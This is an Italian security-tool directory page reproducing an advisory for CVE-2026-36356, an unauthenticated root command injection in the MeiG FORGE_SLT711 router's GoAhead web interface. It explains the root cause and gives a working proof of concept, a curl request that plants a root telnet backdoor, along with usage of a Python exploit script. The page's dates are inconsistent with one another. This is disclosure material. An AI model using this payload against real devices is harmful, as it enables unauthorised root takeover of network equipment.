Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-36356 — CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - Iniezione di comandi OS non autenticata (RCE come root) | Kitploit
Strumenti/GitHubGitHub/totekuh/cve-2026-36356
Sicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlSviluppo Payload
GitHubtotekuh/cve-2026-36356

CVE-2026-36356

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - Iniezione di comandi OS non autenticata (RCE come root)

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead — Iniezione di comandi del sistema operativo non autenticata (/action/SetRemoteAccessCfg)

  • CVE: CVE-2026-36356
  • CWE: CWE-78, CWE-306
  • Scopritore: Daniil Gordeev
  • Divulgato: 2026-05-03

Riepilogo

Il server web GoAhead incluso nei dispositivi CPE 4G LTE MeiG Smart FORGE_SLT711 espone un endpoint HTTP non autenticato, /action/SetRemoteAccessCfg, che interpola l'input JSON controllato dall'utente in un comando shell senza sanificazione. Una singola richiesta POST non autenticata esegue comandi arbitrari come root.

Due cause principali indipendenti: una voce di route di autenticazione mancante e una costruzione non sicura sprintf() → system() nell'handler.

Prodotti interessati

  • Fornitore: MeiG Smart Technology Co., Ltd. (Shenzhen, Cina)
  • Prodotto: Router CPE 4G LTE FORGE_SLT711
  • Firmware confermato: MDM9607.LE.1.0-00110-STD.PROD-1 (firmware modem BC-MGST711H_1.1.1_EQ101)
  • Server web: GoAhead 3.x (Embedthis) con action handler personalizzati MeiG (/usr/bin/goahead)

Il codice vulnerabile si trova nell'action handler personalizzato di MeiG, non nel GoAhead upstream. Altre versioni firmware di questa linea di prodotti sono probabilmente interessate; non verificato in modo indipendente.

Ambiente di test

DispositivoOrtel 4G LTE CPE (OEM: MeiG FORGE_SLT711)
SoCQualcomm MDM9607, ARMv7 Cortex-A7
KernelLinux 3.18.48
FirmwareMDM9607.LE.1.0-00110-STD.PROD-1
Data

Dettagli tecnici

Autenticazione mancante (CWE-306)

La configurazione delle route di GoAhead /var/www/route.txt elenca le route autenticate (righe 64–150) usando auth=basic. /action/SetRemoteAccessCfg non è in questo elenco. L'instradamento ricade sul catch-all alla riga 156:

root@kitploit:~
route uri=/action handler=action

La regola catch-all non ha auth=basic, quindi qualsiasi client HTTP può invocare /action/SetRemoteAccessCfg senza credenziali.

Iniezione di comandi (CWE-78)

L'handler all'offset 0x0003c6d8 di /usr/bin/goahead si decompila nel seguente codice:

root@kitploit:~
char password_buf[64];      // 0x40 bytes on stack
char command_buf[256];      // 0x100 bytes on stack

websGetJsonItemValue(json, "password", STRING, password_buf, 0x40);
sprintf(command_buf, "echo root:\"%s\"|chpasswd", password_buf);
system(command_buf);

Il campo password viene interpolato all'interno di doppi apici. La sostituzione $(...) e i backtick `...` vengono espansi all'interno dei doppi apici, quindi un attaccante controlla il comando shell. system() viene eseguito come uid=0 perché il processo GoAhead gira come root. Nessuna validazione dell'input, nessun escaping, nessuna whitelist di caratteri.

Prova di concetto

Backdoor telnet persistente

root@kitploit:~
curl -s -X POST http://192.168.1.1/action/SetRemoteAccessCfg \
  -H "Content-Type: application/json" \
  -d '{"password":"$(telnetd -l /bin/sh -p 2323 &)"}'
# Reachable via: telnet 192.168.1.1 2323 (root shell, no password)

RCE non autenticata → shell root su un MeiG FORGE_SLT711 (Ortel 4G LTE CPE) tramite /action/SetRemoteAccessCfg

Exploit Python di riferimento

poc_rce.py (pubblicato insieme a questo advisory):

root@kitploit:~
python3 poc_rce.py --ip 192.168.1.1 --cmd 'id > /tmp/out'

Lo sfruttamento è alla cieca — l'output del comando non è nella risposta HTTP.

Vincoli del payload

  • buffer password: 64 byte
  • buffer del comando finale: 256 byte
Scarica lo strumento
2026-02-21